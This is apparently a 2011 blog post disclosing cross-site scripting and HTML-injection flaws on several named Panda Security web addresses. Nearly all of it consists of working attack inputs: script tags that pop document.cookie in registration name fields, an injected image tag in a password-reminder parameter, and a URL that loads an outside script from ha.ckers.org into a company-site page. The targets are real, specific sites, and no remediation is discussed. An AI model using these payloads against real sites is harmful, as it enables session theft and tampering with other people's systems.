# Date: 26.09.2011
# Author: Sony
# Blog : http://st2tea.blogspot.com
..................................................................
Interesting XSS.
http://apac.pandasecurity.com/autovin/wp-admin/admin.php?page=sitepress-multilingual-cms/menu/languages.php icl_ajx_action=get_translator_status&cache=1
After Registration:
First Name : < script >alert(document.cookie)< / script >
Last Name: < script >alert(document.cookie)< / script >
https://mep.pandasecurity.com/admin/index.php?action=showRememberPassword&userKind=[html code injection]
Demo:
https://mep.pandasecurity.com/admin/index.php?action=showRememberPassword&userKind=%22%22%3E%3Cimg%20src=http://www.chinatoday.com/entertain/china.funny.pictures/kung.fu.panda02.jpg%3E
http://matchingseats.us.pandasecurity.com/?company=%22%22%3C/SCRIPT%3E%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E
0 comentarii:
Trimiteți un comentariu
Rețineți: Numai membrii acestui blog pot posta comentarii.